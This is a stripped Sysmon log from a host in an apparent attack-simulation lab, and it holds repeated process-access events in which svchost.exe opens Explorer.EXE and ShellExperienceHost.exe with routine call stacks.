07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047765Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047764Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047763Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047762Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047761Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047760Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047759Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047758Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047757Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047756Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047755Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047754Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047753Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047752Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047751Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047750Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047749Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047748Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047747Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047746Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047745Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047744Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047743Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047742Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047741Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047740Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047739Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047738Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047737Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047736Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047735Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047734Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 